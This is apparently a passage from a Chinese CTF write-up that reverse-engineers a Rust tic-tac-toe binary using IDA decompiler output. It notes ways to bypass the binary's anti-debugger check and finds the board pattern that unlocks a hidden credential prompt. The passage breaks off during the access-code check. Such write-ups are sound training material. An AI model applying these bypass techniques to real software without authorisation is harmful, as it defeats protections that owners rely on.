  int v61; // [rsp+1C8h] [rbp-320h]
  int v62; // [rsp+1CCh] [rbp-31Ch] BYREF
  int v63[6]; // [rsp+1D0h] [rbp-318h] BYREF
  int v64[2]; // [rsp+1E8h] [rbp-300h] BYREF
  int v65[2]; // [rsp+1F0h] [rbp-2F8h]
  char v66[8]; // [rsp+1F8h] [rbp-2F0h]
  _QWORD v67[2]; // [rsp+200h] [rbp-2E8h] BYREF
  int *v68; // [rsp+210h] [rbp-2D8h]
  int v69; // [rsp+21Ch] [rbp-2CCh] BYREF
  _BYTE v70[48]; // [rsp+220h] [rbp-2C8h] BYREF
  __int128 v71; // [rsp+250h] [rbp-298h] BYREF
  __int128 v72; // [rsp+268h] [rbp-280h] BYREF
  __int64 v73; // [rsp+278h] [rbp-270h] BYREF
  _BYTE v74[48]; // [rsp+280h] [rbp-268h] BYREF
  _BYTE v75[48]; // [rsp+2B0h] [rbp-238h] BYREF
  int v76[4]; // [rsp+2E0h] [rbp-208h] BYREF
  int v77[4]; // [rsp+2F8h] [rbp-1F0h] BYREF
  int v78[2]; // [rsp+308h] [rbp-1E0h] BYREF
  char v79[24]; // [rsp+310h] [rbp-1D8h] BYREF
  char v80[8]; // [rsp+328h] [rbp-1C0h] BYREF
  int v81[6]; // [rsp+330h] [rbp-1B8h] BYREF
  _BYTE v82[64]; // [rsp+348h] [rbp-1A0h] BYREF
  int v83[16]; // [rsp+388h] [rbp-160h] BYREF
  _BYTE v84[48]; // [rsp+3C8h] [rbp-120h] BYREF
  int v85[2]; // [rsp+3F8h] [rbp-F0h] BYREF
  __int64 v86; // [rsp+400h] [rbp-E8h]
  int v87; // [rsp+408h] [rbp-E0h]
  _BYTE v88[48]; // [rsp+410h] [rbp-D8h] BYREF
  __int128 v89; // [rsp+440h] [rbp-A8h] BYREF
  __int128 v90; // [rsp+450h] [rbp-98h] BYREF
  _BYTE v91[52]; // [rsp+460h] [rbp-88h] BYREF
  int v92; // [rsp+494h] [rbp-54h]
  __int64 v93; // [rsp+4A8h] [rbp-40h]
  __int64 v94[3]; // [rsp+4B0h] [rbp-38h] BYREF
  __int64 v95; // [rsp+4C8h] [rbp-20h]
  __int64 v96[3]; // [rsp+4D0h] [rbp-18h] BYREF

  tictactoe::detect_debugger();
  for ( *(_QWORD *)v58 = 0LL; *(_QWORD *)v58 < 5uLL; ++*(_QWORD *)v58 )
    *((_DWORD *)v60 + *(_QWORD *)v58) = 45;
  for ( *(_QWORD *)v57 = 0LL; *(_QWORD *)v57 < 5uLL; ++*(_QWORD *)v57 )
  {
    v0 = &v59[5 * *(_QWORD *)v57];
    *(_QWORD *)v0 = v60[0];
    *((_QWORD *)v0 + 1) = v60[1];
    v0[4] = v61;
  }
  v62 = 88;
  alloc::vec::Vec<T>::new(v63);
  while ( 1 )
  {
    while ( 1 )
    {
      *(_QWORD *)v64 = core::array::<impl core::iter::traits::collect::IntoIterator for &[T; N]>::into_iter(v59);
      *(_QWORD *)v65 = v1;
      while ( 1 )
      {
        *(_QWORD *)v66 = <core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::next(v64);
        if ( !*(_QWORD *)v66 )
          break;
        v67[0] = core::array::<impl core::iter::traits::collect::IntoIterator for &[T; N]>::into_iter(*(_QWORD *)v66);
        v67[1] = v29;
        while ( 1 )
        {
          v39 = <core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::next(v67);
          v68 = (int *)v39;
          if ( !v39 )
            break;
          v69 = *v68;
          core::fmt::rt::Argument::new_display(&v72, &v69);
          v71 = v72;
          core::fmt::Arguments::new_v1(v70, &unk_3A52E8, &v71);
          std::io::stdio::_print(v70);
          v38 = std::io::stdio::stdout();
          v73 = v38;
          v34 = <std::io::stdio::Stdout as std::io::Write>::flush(&v73);
          v93 = v34;
          if ( v34 )
          {
            v94[0] = v93;
            core::result::unwrap_failed(aCalledResultUn, 43LL, v94, &off_3A4F00, &off_3A5308);
          }
        }
        core::fmt::Arguments::new_const(v74, &off_3A52D8);
        std::io::stdio::_print(v74);
      }
      core::fmt::rt::Argument::new_display(v77, &v62);
      *(_OWORD *)v76 = *(_OWORD *)v77;
      core::fmt::Arguments::new_v1(v75, &off_3A5140, v76);
      std::io::stdio::_print(v75);
      *(_QWORD *)v78 = std::io::stdio::stdout();
      *(_QWORD *)v56 = <std::io::stdio::Stdout as std::io::Write>::flush(v78);
      v95 = *(_QWORD *)v56;
      if ( *(_QWORD *)v56 )
      {
        v96[0] = v95;
        core::result::unwrap_failed(aCalledResultUn, 43LL, v96, &off_3A4F00, &off_3A5160);
      }
      alloc::string::String::new(v79);
      *(_QWORD *)v80 = std::io::stdio::stdin();
      line = std::io::stdio::Stdin::read_line(v80, v79);
      core::result::Result<T,E>::expect(
        line,
        v3,
        (int)aFailedToReadLi,
        19,
        (int)&off_3A5178,
        v4,
        v30,
        v34,
        v38,
        v39,
        v40,
        v43,
        v45,
        v47);
      v5 = <alloc::string::String as core::ops::deref::Deref>::deref(v79);
      core::str::<impl str>::trim(v5, v6);
      core::str::<impl str>::split_whitespace((int)v83);
      core::iter::traits::iterator::Iterator::filter_map(v82, v83);
      core::iter::traits::iterator::Iterator::collect(v81, v82);
      if ( alloc::vec::Vec<T,A>::len(v81) == 2
        && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5190) < 5uLL
        && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A51A8) < 5uLL )
      {
        *(_QWORD *)v55 = *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A51C0);
        if ( *(_QWORD *)v55 >= 5uLL )
          core::panicking::panic_bounds_check(*(_QWORD *)v55, 5LL, &off_3A51D8);
        v54 = (_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A51F0);
        *(_QWORD *)v53 = *v54;
        if ( *v54 >= 5uLL )
          core::panicking::panic_bounds_check(*(_QWORD *)v53, 5LL, &off_3A51D8);
        if ( v59[5 * *(_QWORD *)v55 + *(_QWORD *)v53] == 45 )
          break;
      }
      core::fmt::Arguments::new_const(v84, &off_3A52C8);
      std::io::stdio::_print(v84);
      core::ptr::drop_in_place<alloc::vec::Vec<usize>>((int)v81, (int)&off_3A52C8, v25, v26, v27, v28, v31, v35);
      core::ptr::drop_in_place<alloc::string::String>(v79);
    }
    v52 = v62;
    *(_QWORD *)v51 = *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5208);
    if ( *(_QWORD *)v51 >= 5uLL )
      core::panicking::panic_bounds_check(*(_QWORD *)v51, 5LL, &off_3A5220);
    v50 = (struct _Unwind_Exception **)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(
                                         v81,
                                         1LL,
                                         &off_3A5238);
    v49 = *v50;
    if ( (unsigned __int64)*v50 >= 5 )
      core::panicking::panic_bounds_check(v49, 5LL, &off_3A5220);
    v59[5 * *(_QWORD *)v51 + (_QWORD)v49] = v52;
    v48 = (_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5250);
    *(_QWORD *)v44 = *v48;
    v46 = (__int64 *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A5268);
    v7 = *v46;
    *(_QWORD *)v85 = *(_QWORD *)v44;
    v86 = v7;
    v87 = v62;
    alloc::vec::Vec<T,A>::push(
      (int)v63,
      (int)v85,
      (int)&off_3A5280,
      v7,
      v8,
      v9,
      (int)v31,
      v35,
      v38,
      v39,
      v40,
      v44[0],
      (int)v46,
      (int)v48,
      v49,
      (int)v50);
    v10 = v62;
    v42 = tictactoe::check_winner(v59, (unsigned int)v62, v63);
    if ( (v42 & 1) != 0 )
    {
      core::fmt::rt::Argument::new_display(&v90, &v62);
      v89 = v90;
      v15 = &off_3A52A8;
      core::fmt::Arguments::new_v1(v88, &off_3A52A8, &v89);
      std::io::stdio::_print(v88);
      goto LABEL_40;
    }
    is_full = tictactoe::is_full(v59);
    if ( (is_full & 1) != 0 )
      break;
    if ( v62 == 88 )
      v92 = 79;
    else
      v92 = 88;
    v62 = v92;
    core::ptr::drop_in_place<alloc::vec::Vec<usize>>((int)v81, v10, v11, v12, v13, v14, v32, v36);
    core::ptr::drop_in_place<alloc::string::String>(v79);
  }
  v15 = &off_3A5298;
  core::fmt::Arguments::new_const(v91, &off_3A5298);
  std::io::stdio::_print(v91);
LABEL_40:
  core::ptr::drop_in_place<alloc::vec::Vec<usize>>((int)v81, (int)v15, v16, v17, v18, v19, v32, v36);
  core::ptr::drop_in_place<alloc::string::String>(v79);
  return core::ptr::drop_in_place<alloc::vec::Vec<(usize,usize,char)>>((int)v63, (int)v15, v20, v21, v22, v23, v33, v37);
}

逆天，tictactoe::detect_debugger 检测到程序被调试就会结束，我试了下 gdb 可以通过 set $rip 绕过，还有一个想法是通过 IDA 把这个调用 patch 成 nop，就是不清楚这两种方法会不会影响到后续的程序执行。不过以「过来人」的结论来说，我们做这题根本用不着动态调试就是了。研究怎么 patch 这个程序又浪费了我十几分钟……后来也没成功，直接放弃了，继续分析……

接着程序中有几个 for 循环，我斗胆猜测一下，应该是初始化棋盘的。然后那个庞大的 while 循环里面，看了下，应该是负责显示棋盘，接收用户输入并设置棋盘。注意到它通过 core::str::<impl str>::trim 去除输入两端的垃圾字符，core::str::<impl str>::split_whitespace 想必就是将输入按空格分隔了，然后 core::iter::traits::iterator::Iterator::filter_map 对输入做了一些过滤，最后用 core::iter::traits::iterator::Iterator::collect 将结果整合起来进行后续的操作。

之后，*(_QWORD *)v55 >= 5uLL 和 *v54 >= 5uLL 的几个 if 应该就是检测输入的行列是否超出了棋盘大小。那就可以很自然的推断出外层 if alloc::vec::Vec<T,A>::len(v81) == 2 && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 0LL, &off_3A5190) < 5uLL && *(_QWORD *)<alloc::vec::Vec<T,A> as core::ops::index::Index<I>>::index(v81, 1LL, &off_3A51A8) < 5uLL 这一长串就是判断提供的输入是否是合法的两个行列数据，并且它们都在合法的范围内。之后又分别对行列数据范围做了检测，没问题就设置棋盘的对应元素。

之后 alloc::vec::Vec<T,A>::push 应该是把棋盘数据保存到 vector 中，用于后续 tictactoe::check_winner 判断哪一方胜出。任何一方胜出后都会跳转到 LABEL_40 回收内存。

tictactoe::is_full，看名字就知道肯定是检测棋盘被填满还没有分出胜负的情况，后续的 std::io::stdio::_print 来看也可以证实这一点，如果填满了就输出 It's a draw!.

目前还没发现任何有关后门的线索，哪怕是验证函数也没见它调用过。我们深入 tictactoe::check_winner 看看：

char __fastcall tictactoe::check_winner(int a1, int a2, __int64 a3, int a4, int a5, int a6)
{
  __int64 v6; // rax
  __int64 v7; // rdx
  __int64 v8; // rax
  __int64 v9; // rdx
  __int64 v10; // rax
  __int64 v11; // rdx
  int v12; // eax
  int v13; // edx
  int v14; // ecx
  int v15; // r8d
  int v16; // r9d
  __int64 v17; // rax
  __int64 v18; // rdx
  char **v19; // rsi
  __int64 v20; // rdx
  __int64 v21; // rax
  unsigned __int64 v22; // rdx
  int v23; // edx
  int v24; // ecx
  int v25; // r8d
  int v26; // r9d
  __int64 v28; // rdx
  int v29; // r8d
  int v30; // r9d
  int v31; // edx
  int v32; // ecx
  int v33; // r8d
  int v34; // r9d
  __int64 v35; // rax
  __int64 v36; // rdx
  int v37; // [rsp+0h] [rbp-358h]
  int v38; // [rsp+0h] [rbp-358h]
  struct _Unwind_Exception *v39; // [rsp+0h] [rbp-358h]
  int v40; // [rsp+8h] [rbp-350h]
  int v41; // [rsp+8h] [rbp-350h]
  int v42; // [rsp+8h] [rbp-350h]
  int v43; // [rsp+10h] [rbp-348h]
  int v44; // [rsp+10h] [rbp-348h]
  int v45; // [rsp+10h] [rbp-348h]
  int v46; // [rsp+18h] [rbp-340h]
  char v47; // [rsp+18h] [rbp-340h]
  int v48; // [rsp+18h] [rbp-340h]
  char v49; // [rsp+1Eh] [rbp-33Ah]
  int v50; // [rsp+20h] [rbp-338h]
  int v51; // [rsp+20h] [rbp-338h]
  int v52; // [rsp+28h] [rbp-330h]
  int v53; // [rsp+28h] [rbp-330h]
  int v54; // [rsp+30h] [rbp-328h]
  int v55; // [rsp+30h] [rbp-328h]
  struct _Unwind_Exception *v56; // [rsp+30h] [rbp-328h]
  char v57; // [rsp+36h] [rbp-322h]
  char v58; // [rsp+37h] [rbp-321h]
  int v59; // [rsp+38h] [rbp-320h]
  int v60; // [rsp+38h] [rbp-320h]
  int v61; // [rsp+38h] [rbp-320h]
  struct _Unwind_Exception *v62; // [rsp+40h] [rbp-318h]
  int v63; // [rsp+40h] [rbp-318h]
  int v64; // [rsp+48h] [rbp-310h]
  int v65; // [rsp+48h] [rbp-310h]
  int v66; // [rsp+50h] [rbp-308h]
  int v67; // [rsp+58h] [rbp-300h]
  int v68; // [rsp+60h] [rbp-2F8h]
  int v69; // [rsp+68h] [rbp-2F0h]
  int v70; // [rsp+88h] [rbp-2D0h]
  int v71; // [rsp+90h] [rbp-2C8h]
  int v72; // [rsp+98h] [rbp-2C0h]
  int v73; // [rsp+A0h] [rbp-2B8h]
  int v74; // [rsp+A8h] [rbp-2B0h]
  int v75; // [rsp+B0h] [rbp-2A8h]
  int v76; // [rsp+B8h] [rbp-2A0h]
  struct _Unwind_Exception *v77; // [rsp+C0h] [rbp-298h]
  int v78[2]; // [rsp+C8h] [rbp-290h]
  int v80; // [rsp+D8h] [rbp-280h] BYREF
  char v81; // [rsp+DFh] [rbp-279h]
  int v82[6]; // [rsp+E0h] [rbp-278h] BYREF
  _BYTE v83[24]; // [rsp+F8h] [rbp-260h] BYREF
  int v84[2]; // [rsp+110h] [rbp-248h] BYREF
  int v85[2]; // [rsp+118h] [rbp-240h]
  int v86[2]; // [rsp+120h] [rbp-238h]
  __int64 v87; // [rsp+128h] [rbp-230h] BYREF
  __int64 v88; // [rsp+130h] [rbp-228h] BYREF
  int v89; // [rsp+13Ch] [rbp-21Ch] BYREF
  _QWORD v90[3]; // [rsp+140h] [rbp-218h] BYREF
  _QWORD v91[3]; // [rsp+158h] [rbp-200h] BYREF
  _BYTE v92[48]; // [rsp+170h] [rbp-1E8h] BYREF
  _OWORD v93[3]; // [rsp+1A0h] [rbp-1B8h] BYREF
  __int128 v94; // [rsp+1D0h] [rbp-188h] BYREF
  __int128 v95; // [rsp+1E0h] [rbp-178h] BYREF
  __int128 v96; // [rsp+1F0h] [rbp-168h] BYREF
  int v97[2]; // [rsp+200h] [rbp-158h] BYREF
  int v98[2]; // [rsp+208h] [rbp-150h]
  int v99[2]; // [rsp+210h] [rbp-148h]
  int v100[2]; // [rsp+218h] [rbp-140h]
  int v101[2]; // [rsp+220h] [rbp-138h] BYREF
  int v102[4]; // [rsp+228h] [rbp-130h]
  int v103[2]; // [rsp+238h] [rbp-120h]
  _BYTE v104[48]; // [rsp+240h] [rbp-118h] BYREF
  _BYTE v105[48]; // [rsp+270h] [rbp-E8h] BYREF
  _QWORD v106[3]; // [rsp+2A0h] [rbp-B8h] BYREF
  unsigned __int64 v107; // [rsp+2B8h] [rbp-A0h]
  unsigned __int64 v108; // [rsp+2C0h] [rbp-98h] BYREF
  int v109[2]; // [rsp+2C8h] [rbp-90h] BYREF
  __int64 v110; // [rsp+2D0h] [rbp-88h]
  _QWORD v111[2]; // [rsp+2D8h] [rbp-80h] BYREF
  _QWORD v112[3]; // [rsp+2E8h] [rbp-70h] BYREF
  _QWORD v113[2]; // [rsp+300h] [rbp-58h] BYREF
  _QWORD v114[4]; // [rsp+310h] [rbp-48h] BYREF
  __int128 v115; // [rsp+330h] [rbp-28h] BYREF
  __int64 v116; // [rsp+340h] [rbp-18h]

  v80 = a2;
  tictactoe::obfuscate_pattern((int)v82, a2, a3, a4, a5, a6, v37, v40, v43, v46, v50, v52, v54, v59, v62, v64);
  alloc::string::String::new(v83);
  v6 = <alloc::vec::Vec<T,A> as core::ops::deref::Deref>::deref(a3);
  v76 = v7;
  v77 = (struct _Unwind_Exception *)v6;
  v8 = core::slice::<impl [T]>::iter(v6, v7);
  v72 = v9;
  v73 = v8;
  v10 = <I as core::iter::traits::collect::IntoIterator>::into_iter(v8, v9);
  v70 = v11;
  v71 = v10;
  *(_QWORD *)v84 = v10;
  *(_QWORD *)v85 = v11;
  while ( 1 )
  {
    *(_QWORD *)v86 = <core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::next(v84);
    if ( !*(_QWORD *)v86 )
      break;
    v87 = **(_QWORD **)v86;
    v88 = *(_QWORD *)(*(_QWORD *)v86 + 8LL);
    v89 = *(_DWORD *)(*(_QWORD *)v86 + 16LL);
    core::fmt::rt::Argument::new_display(&v94, &v89);
    core::fmt::rt::Argument::new_display(&v95, &v87);
    core::fmt::rt::Argument::new_display(&v96, &v88);
    v93[0] = v94;
    v93[1] = v95;
    v93[2] = v96;
    core::fmt::Arguments::new_v1(v92, &unk_3A5110, v93);
    alloc::fmt::format((unsigned int)v91, (unsigned int)v92);
    v90[0] = v91[0];
    v90[1] = v91[1];
    v90[2] = v91[2];
    v35 = <alloc::string::String as core::ops::deref::Deref>::deref(v90);
    v41 = v36;
    v44 = v35;
    alloc::string::String::push_str(v83, v35, v36);
    core::ptr::drop_in_place<alloc::string::String>(v90);
  }
  v12 = <alloc::string::String as core::ops::deref::Deref>::deref(v82);
  regex::regex::string::Regex::new(
    (int)v101,
    v12,
    v13,
    v14,
    v15,
    v16,
    v38,
    v41,
    v44,
    v47,
    v51,
    v53,
    v55,
    v60,
    v63,
    v65,
    v66,
    v67,
    v68,
    v69,
    v13,
    v12,
    0,
    v70,
    v71,
    v72,
    v73,
    v74,
    v75,
    v76,
    v77,
    a1);
  if ( !*(_QWORD *)v101 )
  {
    v116 = *(_QWORD *)v103;
    v115 = *(_OWORD *)v102;
    core::result::unwrap_failed(aCalledResultUn, 43LL, &v115, &off_3A4EE0, &off_3A50D0);
  }
  *(_QWORD *)v97 = *(_QWORD *)v101;
  *(_QWORD *)v98 = *(_QWORD *)v102;
  *(_QWORD *)v99 = *(_QWORD *)&v102[2];
  *(_QWORD *)v100 = *(_QWORD *)v103;
  v17 = <alloc::string::String as core::ops::deref::Deref>::deref(v83);
  if ( (regex::regex::string::Regex::is_match(v97, v17, v18) & 1) != 0 )
  {
    v19 = &off_3A5100;
    core::fmt::Arguments::new_const(v104, &off_3A5100);
    std::io::stdio::_print(v104);
    if ( (tictactoe::validate_access_code((int)v104, (int)&off_3A5100, v31, v32, v33, v34) & 1) != 0 )
    {
      tictactoe::ask_for_credentials();
      v81 = 1;
    }
    else
    {
      v19 = &off_3A4FE8;
      core::fmt::Arguments::new_const(v105, &off_3A4FE8);
      std::io::stdio::_print(v105);
      v81 = 0;
    }
  }
  else
  {
    v106[0] = <I as core::iter::traits::collect::IntoIterator>::into_iter(0LL, 5LL);
    v106[1] = v20;
    while ( 1 )
    {
      v21 = core::iter::range::<impl core::iter::traits::iterator::Iterator for core::ops::range::Range<A>>::next(v106);
      v61 = v22;
      v106[2] = v21;
      v107 = v22;
      if ( !v21 )
        break;
      v108 = v107;
      if ( v107 >= 5 )
        core::panicking::panic_bounds_check(v108, 5LL, (__int64)&off_3A50E8);
      *(_QWORD *)v109 = core::slice::<impl [T]>::iter(*(_QWORD *)v78 + 20 * v108, 5LL);
      v110 = v28;
      v19 = (char **)&v80;
      if ( (<core::slice::iter::Iter<T> as core::iter::traits::iterator::Iterator>::all(
              (int)v109,
              (int)&v80,
              v28,
              v109[0],
              v29,
              v30,
              (int)v39,
              v42,
              v45,
              v48,
              v28,
              v109[0],
              v56,
              v61) & 1) != 0 )
      {
        v81 = 1;
        goto LABEL_21;
      }
      v111[0] = 0LL;
      v111[1] = 5LL;
      v112[0] = *(_QWORD *)v78;
      v112[1] = &v108;
      v112[2] = &v80;
      v19 = (char **)v112;
      v49 = core::iter::traits::iterator::Iterator::all(v111, v112);
      if ( (v49 & 1) != 0 )
      {
        v81 = 1;
        goto LABEL_21;
      }
    }
    LODWORD(v19) = v78[0];
    v113[0] = 0LL;
    v113[1] = 5LL;
    v58 = core::iter::traits::iterator::Iterator::all(v113, *(_QWORD *)v78, &v80);
    if ( (v58 & 1) != 0 )
    {
      v81 = 1;
      goto LABEL_21;
    }
    LODWORD(v19) = v78[0];
    v114[0] = 0LL;
    v114[1] = 5LL;
    v57 = core::iter::traits::iterator::Iterator::all(v114, *(_QWORD *)v78, &v80);
    if ( (v57 & 1) == 0 )
    {
      v81 = 0;
      core::ptr::drop_in_place<regex::regex::string::Regex>((int)v97, v78[0], v23, v24, v25, v26, v39, v42);
      core::ptr::drop_in_place<alloc::string::String>(v83);
      core::ptr::drop_in_place<alloc::string::String>(v82);
      return v81 & 1;
    }
    v81 = 1;
  }
LABEL_21:
  core::ptr::drop_in_place<regex::regex::string::Regex>((int)v97, (int)v19, v23, v24, v25, v26, v39, v42);
  core::ptr::drop_in_place<alloc::string::String>(v83);
  core::ptr::drop_in_place<alloc::string::String>(v82);
  return v81 & 1;
}

发现一个叫做 tictactoe::obfuscate_pattern 的函数。

我对 obfuscate 这样的字眼比较敏感，并且函数名中有 pattern，直觉就告诉我这个函数应该是在检测某种棋盘布局，带着这样的直觉进入函数内部一探究竟，果不其然：

__int64 __fastcall tictactoe::obfuscate_pattern(__int64 a1)
{
  __int64 v1; // rdx
  __int64 v2; // rcx
  __int64 v3; // r8
  __int64 v4; // r9
  __int64 v5; // rax
  __int64 v6; // rdx
  int v7; // esi
  int v8; // edx
  int v9; // ecx
  int v10; // r8d
  int v11; // r9d
  int v13; // [rsp+8h] [rbp-50h]
  __int64 v14; // [rsp+28h] [rbp-30h]
  struct _Unwind_Exception v15; // [rsp+30h] [rbp-28h] BYREF

  v14 = alloc::alloc::exchange_malloc(144LL, 8LL);
  if ( (v14 & 7) != 0 )
    core::panicking::panic_misaligned_pointer_dereference(8LL, v14, &off_3A50B8);
  if ( !v14 )
    ((void (__fastcall __noreturn *)(char **, __int64, __int64, __int64, __int64, __int64))core::panicking::panic_null_pointer_dereference)(
      &off_3A50B8,
      8LL,
      v1,
      v2,
      v3,
      v4);
  *(_QWORD *)v14 = aX00;
  *(_QWORD *)(v14 + 8) = 4LL;
  *(_QWORD *)(v14 + 16) = "O:04>";
  *(_QWORD *)(v14 + 24) = 4LL;
  *(_QWORD *)(v14 + 32) = "X:11mode{";
  *(_QWORD *)(v14 + 40) = 4LL;
  *(_QWORD *)(v14 + 48) = "O:13~";
  *(_QWORD *)(v14 + 56) = 4LL;
  *(_QWORD *)(v14 + 64) = aX22;
  *(_QWORD *)(v14 + 72) = 4LL;
  *(_QWORD *)(v14 + 80) = aO31;
  *(_QWORD *)(v14 + 88) = 4LL;
  *(_QWORD *)(v14 + 96) = aX33;
  *(_QWORD *)(v14 + 104) = 4LL;
  *(_QWORD *)(v14 + 112) = "O:40X:44utf8info\\";
  *(_QWORD *)(v14 + 120) = 4LL;
  *(_QWORD *)(v14 + 128) = "X:44utf8info\\";
  *(_QWORD *)(v14 + 136) = 4LL;
  alloc::slice::<impl [T]>::into_vec(&v15, v14, 9LL);
  v5 = <alloc::vec::Vec<T,A> as core::ops::deref::Deref>::deref(&v15);
  v13 = v6;
  v7 = v5;
  alloc::slice::<impl [T]>::join(a1, v5, v6, 1LL, 0LL);
  core::ptr::drop_in_place<alloc::vec::Vec<&str>>((int)&v15, v7, v8, v9, v10, v11, &v15, v13);
  return a1;
}

[...]
.rodata:0000000000080368 aX00            db 'X:00'               ; DATA XREF: tictactoe::obfuscate_pattern+61↓o
.rodata:00000000000823BC aO04            db 'O:04'               ; DATA XREF: tictactoe::obfuscate_pattern+73↓o
.rodata:0000000000082884 aX11            db 'X:11'               ; DATA XREF: tictactoe::obfuscate_pattern+86↓o
.rodata:0000000000081C24 aO13            db 'O:13'               ; DATA XREF: tictactoe::obfuscate_pattern+99↓o
.rodata:000000000008190C aX22            db 'X:22'               ; DATA XREF: tictactoe::obfuscate_pattern+AC↓o
.rodata:0000000000080364 aO31            db 'O:31'               ; DATA XREF: tictactoe::obfuscate_pattern+BF↓o
.rodata:0000000000080654 aX33            db 'X:33'               ; DATA XREF: tictactoe::obfuscate_pattern+D2↓o
.rodata:000000000007FB80 aO40            db 'O:40'               ; DATA XREF: tictactoe::obfuscate_pattern+E5↓o
.rodata:000000000007FB84 aX44            db 'X:44'               ; DATA XREF: tictactoe::obfuscate_pattern+F8↓o
[...]

棋盘上每个空都是一个 QWORD，而 aX00，aO31 这样的名字，很容易让人联想到 X 和 O 棋子，说不定这后面的数字就代表这个棋子在棋盘中的坐标。

猜想是否正确，我们照着输一遍就是了：

Player O's turn. Enter row and column (0-4): 4 0
X - - - O
- X - O -
- - X - -
- O - X -
O - - - -

Player X's turn. Enter row and column (0-4): 4 4

--- Pattern Recognized! ---

--- Hidden Interface Unlocked ---
Enter Username:

Bingo ! 解锁隐藏界面。

现在我们成功进入了 regex::regex::string::Regex::is_match(v97, v17, v18) & 1) != 0 内部，调用了 tictactoe::ask_for_credentials。这个函数先获取输入作为 username，看了一下它只是随便接收了一个输入，并没有对其做任何判断，说明 username 可以是任意的。然后问我们要 Access Code，并通过 tictactoe::sha256_hash 将我们输入的 Access Code 转换为 sha256.

__int64 tictactoe::ask_for_credentials()
{
  int v0; // eax
  int v1; // edx
  int v2; // r9d
  __int64 v3; // rax
  __int64 v4; // rdx
  __int64 v5; // rdx
  int v6; // eax
  struct _Unwind_Exception *v7; // rdx
  int v8; // r9d
  __int64 v9; // rax
  __int64 v10; // rdx
  int v11; // eax
  int v12; // edx
  int v13; // edx
  int v14; // ecx
  int v15; // r8d
  int v16; // r9d
  int v18; // [rsp+0h] [rbp-2A8h]
  int v19; // [rsp+0h] [rbp-2A8h]
  int v20; // [rsp+8h] [rbp-2A0h]
  int v21; // [rsp+8h] [rbp-2A0h]
  int v22; // [rsp+10h] [rbp-298h]
  int v23; // [rsp+10h] [rbp-298h]
  int v24; // [rsp+18h] [rbp-290h]
  int v25; // [rsp+18h] [rbp-290h]
  int v26; // [rsp+20h] [rbp-288h]
  int v27; // [rsp+20h] [rbp-288h]
  char v28; // [rsp+28h] [rbp-280h]
  char v29; // [rsp+28h] [rbp-280h]
  struct _Unwind_Exception *v30; // [rsp+30h] [rbp-278h]
  int v31; // [rsp+38h] [rbp-270h]
  int v32[12]; // [rsp+C8h] [rbp-1E0h] BYREF
  _BYTE v33[24]; // [rsp+F8h] [rbp-1B0h] BYREF
  _BYTE v34[24]; // [rsp+110h] [rbp-198h] BYREF
  _BYTE v35[48]; // [rsp+128h] [rbp-180h] BYREF
  __int64 v36; // [rsp+158h] [rbp-150h] BYREF
  __int64 v37; // [rsp+160h] [rbp-148h] BYREF
  _QWORD v38[2]; // [rsp+168h] [rbp-140h] BYREF
  _BYTE v39[48]; // [rsp+178h] [rbp-130h] BYREF
  __int64 v40; // [rsp+1A8h] [rbp-100h] BYREF
  __int64 v41; // [rsp+1B0h] [rbp-F8h] BYREF
  int v42[6]; // [rsp+1B8h] [rbp-F0h] BYREF
  _BYTE v43[48]; // [rsp+1D0h] [rbp-D8h] BYREF
  __int128 v44; // [rsp+200h] [rbp-A8h] BYREF
  __int128 v45; // [rsp+218h] [rbp-90h] BYREF
  _BYTE v46[64]; // [rsp+228h] [rbp-80h] BYREF
  __int64 v47; // [rsp+268h] [rbp-40h]
  __int64 v48[3]; // [rsp+270h] [rbp-38h] BYREF
  __int64 v49; // [rsp+288h] [rbp-20h]
  __int64 v50[3]; // [rsp+290h] [rbp-18h] BYREF

  core::fmt::Arguments::new_const(v32, &off_3A4FF8);
  std::io::stdio::_print(v32);
  alloc::string::String::new(v33);
  alloc::string::String::new(v34);
  core::fmt::Arguments::new_const(v35, &off_3A5008);
  std::io::stdio::_print(v35);
  v36 = std::io::stdio::stdout();
  v49 = <std::io::stdio::Stdout as std::io::Write>::flush(&v36);
  if ( v49 )
  {
    v50[0] = v49;
    core::result::unwrap_failed(aCalledResultUn, 43LL, v50, &off_3A4F00, &off_3A5018);
  }
  v37 = std::io::stdio::stdin();
  v0 = std::io::stdio::Stdin::read_line(&v37, v33);
  core::result::Result<T,E>::expect(
    v0,
    v1,
    (int)aFailedToReadUs,
    23,
    (int)&off_3A5030,
    v2,
    v18,
    v20,
    v22,
    v24,
    v26,
    v28,
    v30,
    v31);
  v3 = <alloc::string::String as core::ops::deref::Deref>::deref(v33);
  v38[0] = core::str::<impl str>::trim(v3, v4);
  v38[1] = v5;
  core::fmt::Arguments::new_const(v39, &off_3A5048);
  std::io::stdio::_print(v39);
  v40 = std::io::stdio::stdout();
  v47 = <std::io::stdio::Stdout as std::io::Write>::flush(&v40);
  if ( v47 )
  {
    v48[0] = v47;
    core::result::unwrap_failed(aCalledResultUn, 43LL, v48, &off_3A4F00, &off_3A5058);
  }
  v41 = std::io::stdio::stdin();
  v6 = std::io::stdio::Stdin::read_line(&v41, v34);
  core::result::Result<T,E>::expect(
    v6,
    (int)v7,
    (int)aFailedToReadAc,
    26,
    (int)&off_3A5070,
    v8,
    v19,
    v21,
    v23,
    v25,
    v27,
    v29,
    v7,
    v6);
  v9 = <alloc::string::String as core::ops::deref::Deref>::deref(v34);
  v11 = core::str::<impl str>::trim(v9, v10);
  tictactoe::sha256_hash((int)v42, v11, v12);
  if ( (<alloc::string::String as core::cmp::PartialEq<&str>>::eq(v42, &off_3A4F88) & 1) == 0 )
  {
    core::ptr::drop_in_place<alloc::string::String>(v42);
    core::fmt::Arguments::new_const(v46, &off_3A5088);
